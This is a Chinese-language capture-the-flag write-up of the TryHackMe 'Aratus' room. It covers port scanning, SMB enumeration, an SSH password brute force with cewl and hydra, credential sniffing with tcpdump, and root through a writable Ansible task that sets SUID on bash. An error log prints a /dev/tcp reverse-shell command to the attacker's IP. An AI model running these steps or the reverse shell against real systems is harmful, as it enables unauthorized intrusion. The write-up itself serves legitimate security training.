打靶记录(一零七)之THMAratus

端口扫描

nmap --min-rate=10000 -p- 10.10.237.69         
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-26 15:18 UTC
Nmap scan report for ip-10-10-149-178.eu-west-1.compute.internal (10.10.237.69)
Host is up (0.011s latency).
Not shown: 65510 filtered tcp ports (no-response), 19 filtered tcp ports (host-prohibited)
PORT    STATE SERVICE
21/tcp  open  ftp
22/tcp  open  ssh
80/tcp  open  http
139/tcp open  netbios-ssn
443/tcp open  https
445/tcp open  microsoft-ds
MAC Address: 02:A4:78:F1:74:81 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 13.42 seconds

nmap -sV -sT -sC -O -p21,22,80,139,443,445 10.10.237.69
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-26 15:20 UTC
Nmap scan report for ip-10-10-149-178.eu-west-1.compute.internal (10.10.237.69)
Host is up (0.00052s latency).

PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 3.0.2
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.10.171.240
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.2 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x    2 0        0               6 Jun 09  2021 pub
22/tcp  open  ssh         OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 092362a2186283690440623297ff3ccd (RSA)
|   256 33663536b0680632c18af601bc4338ce (ECDSA)
|_  256 1498e3847055e6600cc20977f8b7a61c (ED25519)
80/tcp  open  http        Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips)
|_http-title: Apache HTTP Server Test Page powered by CentOS
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open  ssl/http    Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Apache HTTP Server Test Page powered by CentOS
| ssl-cert: Subject: commonName=aratus/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2021-11-23T12:28:26
|_Not valid after:  2022-11-23T12:28:26
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips
|_ssl-date: TLS randomness does not represent time
445/tcp open  netbios-ssn Samba smbd 4.10.16 (workgroup: WORKGROUP)
MAC Address: 02:A4:78:F1:74:81 (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|specialized
Running (JUST GUESSING): Linux 3.X (98%), Crestron 2-Series (90%)
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:crestron:2_series
Aggressive OS guesses: Linux 3.10 - 3.13 (98%), Linux 3.8 (92%), Crestron XPanel control system (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: ARATUS; OS: Unix

Host script results:
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.10.16)
|   Computer name: aratus
|   NetBIOS computer name: ARATUS\x00
|   Domain name: \x00
|   FQDN: aratus
|_  System time: 2023-12-26T16:20:29+01:00
| smb2-time: 
|   date: 2023-12-26T15:20:28
|_  start_date: N/A
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
|_clock-skew: mean: -19m59s, deviation: 34m37s, median: 0s

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.49 seconds

Getshell

能够匿名登录，有一个pub目录但是里面是空的

enum4linux得到一个共享目录

   print$          Disk      Printer Drivers
   temporary share Disk      

smbclient //10.10.237.69/'temporary share'
Password for [WORKGROUP\mikannse]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Jan 10 13:06:44 2022
  ..                                  D        0  Tue Nov 23 16:24:05 2021
  .bash_logout                        H       18  Wed Apr  1 02:17:30 2020
  .bash_profile                       H      193  Wed Apr  1 02:17:30 2020
  .bashrc                             H      231  Wed Apr  1 02:17:30 2020
  .bash_history                       H        0  Sun Mar 17 14:01:57 2024
  chapter1                            D        0  Tue Nov 23 10:07:47 2021
  chapter2                            D        0  Tue Nov 23 10:08:11 2021
  chapter3                            D        0  Tue Nov 23 10:08:18 2021
  chapter4                            D        0  Tue Nov 23 10:08:25 2021
  chapter5                            D        0  Tue Nov 23 10:08:33 2021
  chapter6                            D        0  Tue Nov 23 10:12:24 2021
  chapter7                            D        0  Tue Nov 23 11:14:27 2021
  chapter8                            D        0  Tue Nov 23 10:12:45 2021
  chapter9                            D        0  Tue Nov 23 10:12:53 2021
  .ssh                               DH        0  Mon Jan 10 13:05:34 2022
  .viminfo                            H        0  Sun Mar 17 14:01:57 2024
  message-to-simeon.txt               N      251  Mon Jan 10 13:06:44 2022

                37726212 blocks of size 1024. 35598260 blocks available

有一张纸条

Simeon,

Stop messing with your home directory, you are moving files and directories insecurely!
Just make a folder in /opt for your book project...

Also you password is insecure, could you please change it? It is all over the place now!

- Theodore

尝试直接爆破ssh但似乎不允许，好吧根据提示这个密码似乎由他书中的单词组成，但是我一爆破就报错，重启靶机也没用，我搜不了列!

总之就是

cewl http://10.10.237.69/simeon/ >word.txt

hydra -l simeon -P word.txt ssh://10.10.237.69 -v

密码是:scelerisque

横向移动

没有什么其他信息，但是看到内核的版本很低，尝试dirtycow，但是失败了，似乎是没有一个权限，那就上传一个pspy

/usr/bin/python3 /home/theodore/scripts/test-www-auth.py

/bin/sh -c ping -c 30 127.0.0.1 >/dev/null 2>&1

发现两条可以进程，在自己ping自己?房间也提示pcap

getcap -r / 2>/dev/null
/usr/bin/ping = cap_net_admin,cap_net_raw+p
/usr/bin/newgidmap = cap_setgid+ep
/usr/bin/newuidmap = cap_setuid+ep
/usr/sbin/arping = cap_net_raw+p
/usr/sbin/clockdiff = cap_net_raw+p
/usr/sbin/tcpdump = cap_net_admin,cap_net_raw+eip
/usr/sbin/suexec = cap_setgid,cap_setuid+ep

有一个tcpdump可以用

tcpdump -i lo -A

里面发现一个http响应

........GET /test-auth/index.html HTTP/1.1
Host: 127.0.0.1
User-Agent: python-requests/2.14.2
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Authorization: Basic dGhlb2RvcmU6UmlqeWFzd2FoZWJjZWliYXJqaWs=

将Authorization解码得到:theodore:Rijyaswahebceibarjik

转移

[theodore@aratus scripts]$ sudo -l
匹配 %2$s 上 %1$s 的默认条目：
    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME
    HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
    LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
    env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

用户 theodore 可以在 aratus 上运行以下命令：
    (automation) NOPASSWD: /opt/scripts/infra_as_code.sh

提权

内容是

#!/bin/bash
cd /opt/ansible
/usr/bin/ansible-playbook /opt/ansible/playbooks/*.yaml

ansible是redhat的一个自动化部署工具，sudo运行之后也确实在自动化地完成了一些工作

查找可写文件，发现

find /opt/ansible/ -type f -writable
/opt/ansible/roles/geerlingguy.apache/tasks/configure-RedHat.yml
/opt/ansible/README.txt

将/opt/ansible/roles/geerlingguy.apache/tasks/configure-RedHat.yml中结尾追加

- name: bash
  command: chmod +s /bin/bash

本来是做了一个反弹shell的，但是报错了

fatal: [10.10.237.69]: FAILED! => {"changed": true, "cmd": ["/bin/sh", "-i", ">&", "/dev/tcp/10.11.77.28/443", "0>&1"], "delta": "0:00:00.004717", "end": "2024-03-17 16:41:41.083234", "msg": "non-zero return code", "rc": 127, "start": "2024-03-17 16:41:41.078517", "stderr": "sh: >&: 没有那个文件或目录", "stderr_lines": ["sh: >&: 没有那个文件或目录"], "stdout": "", "stdout_lines": []}     

不是很清楚什么情况

sudo -u automation /opt/scripts/infra_as_code.sh

/bin/bash -p

现在我们是root

碎碎念

还是比较有趣的房间，一开始用cewl命令可以提取网页关键词还是非常不错的工具，后面的tcpcump和ansible都是比较新鲜的内容